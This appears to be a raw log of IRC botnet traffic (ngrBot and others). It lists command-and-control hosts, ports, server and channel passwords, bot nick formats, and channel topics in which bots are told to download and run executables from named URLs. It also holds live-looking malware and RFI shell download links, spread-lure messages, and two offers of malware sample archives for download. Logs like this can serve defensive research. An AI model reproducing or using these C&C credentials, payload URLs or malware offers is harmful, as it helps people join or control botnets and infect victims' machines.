Remote Host Port Number
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80
NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com
C&C Server: 64.69.44.51:4042
Server Password:
Username: hh
Nickname: new[DEU|XP|DELL-D3E62F7E26]tmlnhjx
Channel: #biznew# (Password: )
Channeltopic: :!down /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/57/38/42/59/51/59/52/20/52/54/38/67/114/97/97/40/105/109/102/
* The data identified by the following URL was then requested from
91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865
PASS ngrBot
NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting
Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]
hosting infos: http://whois.domaintools.com/91.211.117.46
Worm.Win32.FFAuto.uy
Exe file: http://123back.com/1.EXE
Java drive by: http://123back.com/
* The following Host Names were requested from a host database:
o sam.chatsmate.com
o ms.tvchatz.com
o chatsmate.com
o justchatz.com
o tvchatz.com
sam.chatsmate.com ms.tvchatz.com chatsmate.com justchatz.com
UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address:
12mb malware samples
Mostly botnets and banking trojans, have fun. Download: http://e422237e.tubeviral.com
193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)
Remote Host Port Number
193.106.172.131 1863
PASS ngrBot
213.251.170.52 80
NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691
UPDATE:
NICK n{US|XPa}llwonwe
USER llwonwe 0 0 :llwonwe
JOIN #80t35ref 1963.g3rb3rs1t0.3691
Now talking in #80t35ref
Topic On: [ #80t35ref ] [ *pu http://vector7.net/pOUI712yd.exe 0bba6a00254d8eec745e831e1e90d75d ]
Topic By: [ cholo ]
hosting infos: http://whois.domaintools.com/193.106.172.131
jskd6c.jumpingcrab.com(ngrBot hosted in Panama Eric Szopa)
Looks like ngrBot, the reptile mod made by fubar and jam3s, is spreading a lot.
Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]
Remote Host Port Number
184.107.143.126 2009 and 6667
PASS ngrBot
213.251.170.52 80
70.85.227.66 80
PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo 😀 http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file
ziggy.no-ip.org(botnet hosted in Canada Frantech Solutions)
Remote Host Port Number
205.185.122.148 6667
PASS nickz23
205.185.122.148 80
NICK {NEW}[USA][XP-SP2]976017
USER 4242 "" "lol" :4242
PONG :D78F0ECE
JOIN #bots
* The data identified by the following URL was then requested from the remote web server:
o http://ziggy.no-ip.org/lsass.exe
hosting infos: http://whois.domaintools.com/205.185.122.148
209.172.59.146(ngrBot hosted in Canada Toronto Iweb Technologies Inc)
Remote Host Port Number
209.172.59.146 5794
PASS ngrBot
213.251.170.52 80
74.53.197.4 80
NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 15 domain(s)
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt
EXE File: http://conectaamor.com/_server/editor/images/fudnew2.exe
RFI SHELL: http://conectaamor.com/_server/editor/images/lang.php
irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)
50.28.21.18:8890
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO
Remote Host Port Number
50.28.21.18 7659
PASS fuck
NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422
hosting infos: http://whois.domaintools.com/50.28.21.18
42mb malware samples
This package has a lot of RATs and banking trojans inside, have fun. Download: http://c3266cfc.tubeviral.com